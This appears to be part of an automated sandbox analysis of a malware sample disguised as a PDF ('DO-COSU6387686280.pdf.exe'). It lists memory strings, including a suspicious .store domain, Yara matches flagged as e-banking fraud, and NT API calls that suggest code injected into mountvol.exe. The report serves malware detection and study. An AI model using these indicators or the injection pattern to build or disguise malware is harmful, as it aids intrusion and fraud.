                    Source: EnLuReulIds.exe, 00000007.00000002.3916754998.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store
                    Source: EnLuReulIds.exe, 00000007.00000002.3916754998.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store/3agz/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
                    Source: mountvol.exe, 00000006.00000002.3917281058.0000000006010000.00000004.00000800.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3914892156.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003E66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002BCE000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mountvol.exe, 00000006.00000003.1955738952.0000000007AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
                    Source: EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server118.hosting.reg.ru/manager
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000431C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign

                    E-Banking Fraud

                    Source: Yara matchFile source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: initial sampleStatic PE information: Filename: DO-COSU6387686280.pdf.exe
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B60 NtClose,LdrInitializeThunk,3_2_017D2B60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_017D2DF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017D2C70
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D35C0 NtCreateMutant,LdrInitializeThunk,3_2_017D35C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D4340 NtSetContextThread,3_2_017D4340
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D4650 NtSuspendThread,3_2_017D4650
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BF0 NtAllocateVirtualMemory,3_2_017D2BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BE0 NtQueryValueKey,3_2_017D2BE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BA0 NtEnumerateValueKey,3_2_017D2BA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B80 NtQueryInformationFile,3_2_017D2B80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AF0 NtWriteFile,3_2_017D2AF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AD0 NtReadFile,3_2_017D2AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AB0 NtWaitForSingleObject,3_2_017D2AB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D30 NtUnmapViewOfSection,3_2_017D2D30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D10 NtMapViewOfSection,3_2_017D2D10
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D00 NtSetInformationFile,3_2_017D2D00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DD0 NtDelayExecution,3_2_017D2DD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DB0 NtEnumerateKey,3_2_017D2DB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C60 NtCreateKey,3_2_017D2C60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C00 NtQueryInformationProcess,3_2_017D2C00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CF0 NtOpenProcess,3_2_017D2CF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CC0 NtQueryVirtualMemory,3_2_017D2CC0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CA0 NtQueryInformationToken,3_2_017D2CA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F60 NtCreateProcessEx,3_2_017D2F60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F30 NtCreateSection,3_2_017D2F30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FE0 NtCreateFile,3_2_017D2FE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FB0 NtResumeThread,3_2_017D2FB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FA0 NtQuerySection,3_2_017D2FA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F90 NtProtectVirtualMemory,3_2_017D2F90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2E30 NtWriteVirtualMemory,3_2_017D2E30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2EE0 NtQueueApcThread,3_2_017D2EE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2EA0 NtAdjustPrivilegesToken,3_2_017D2EA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2E80 NtReadVirtualMemory,3_2_017D2E80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3010 NtOpenDirectoryObject,3_2_017D3010
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3090 NtSetValueKey,3_2_017D3090
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D39B0 NtGetContextThread,3_2_017D39B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3D70 NtOpenThread,3_2_017D3D70
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3D10 NtOpenProcessToken,3_2_017D3D10
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0042CA43 NtClose,3_2_0042CA43
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03124340 NtSetContextThread,LdrInitializeThunk,6_2_03124340
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03124650 NtSuspendThread,LdrInitializeThunk,6_2_03124650
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122B60 NtClose,LdrInitializeThunk,6_2_03122B60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03122BA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03122BF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03122BE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AD0 NtReadFile,LdrInitializeThunk,6_2_03122AD0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AF0 NtWriteFile,LdrInitializeThunk,6_2_03122AF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F30 NtCreateSection,LdrInitializeThunk,6_2_03122F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FB0 NtResumeThread,LdrInitializeThunk,6_2_03122FB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FE0 NtCreateFile,LdrInitializeThunk,6_2_03122FE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03122E80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03122EE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03122D10
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03122D30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DD0 NtDelayExecution,LdrInitializeThunk,6_2_03122DD0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03122DF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03122C70
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C60 NtCreateKey,LdrInitializeThunk,6_2_03122C60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03122CA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031235C0 NtCreateMutant,LdrInitializeThunk,6_2_031235C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031239B0 NtGetContextThread,LdrInitializeThunk,6_2_031239B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122B80 NtQueryInformationFile,6_2_03122B80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AB0 NtWaitForSingleObject,6_2_03122AB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F60 NtCreateProcessEx,6_2_03122F60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F90 NtProtectVirtualMemory,6_2_03122F90
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FA0 NtQuerySection,6_2_03122FA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122E30 NtWriteVirtualMemory,6_2_03122E30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122EA0 NtAdjustPrivilegesToken,6_2_03122EA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D00 NtSetInformationFile,6_2_03122D00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DB0 NtEnumerateKey,6_2_03122DB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C00 NtQueryInformationProcess,6_2_03122C00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CC0 NtQueryVirtualMemory,6_2_03122CC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CF0 NtOpenProcess,6_2_03122CF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123010 NtOpenDirectoryObject,6_2_03123010
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123090 NtSetValueKey,6_2_03123090
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123D10 NtOpenProcessToken,6_2_03123D10
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123D70 NtOpenThread,6_2_03123D70
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A496D0 NtDeleteFile,6_2_02A496D0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A49770 NtClose,6_2_02A49770
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A49470 NtCreateFile,6_2_02A49470
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A495E0 NtReadFile,6_2_02A495E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A498D0 NtAllocateVirtualMemory,6_2_02A498D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185CE933_2_0185CE93
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0E593_2_017A0E59
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185EEDB3_2_0185EEDB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185EE263_2_0185EE26
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2E903_2_017B2E90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178F1723_2_0178F172
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D516C3_2_017D516C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AB1B03_2_017AB1B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186B16B3_2_0186B16B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184F0CC3_2_0184F0CC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F0E03_2_0185F0E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018570E93_2_018570E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A70C03_2_017A70C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178D34C3_2_0178D34C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185132D3_2_0185132D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E739A3_2_017E739A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018412ED3_2_018412ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BB2C03_2_017BB2C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A52A03_2_017A52A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183D5B03_2_0183D5B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018695C33_2_018695C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018575713_2_01857571
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017914603_2_01791460
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F43F3_2_0185F43F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F7B03_2_0185F7B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018516CC3_2_018516CC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E56303_2_017E5630
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A99503_2_017A9950
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BB9503_2_017BB950
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018359103_2_01835910
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180D8003_2_0180D800
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A38E03_2_017A38E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01815BF03_2_01815BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017DDBF93_2_017DDBF9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FB763_2_0185FB76
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BFB803_2_017BFB80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01841AA33_2_01841AA3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183DAAC3_2_0183DAAC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184DAC63_2_0184DAC6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01857A463_2_01857A46
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FA493_2_0185FA49
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E5AA03_2_017E5AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01813A6C3_2_01813A6C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A3D403_2_017A3D40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BFDC03_2_017BFDC0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01851D5A3_2_01851D5A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01857D733_2_01857D73
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FCF23_2_0185FCF2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01819C323_2_01819C32
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FFB13_2_0185FFB1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FF093_2_0185FF09
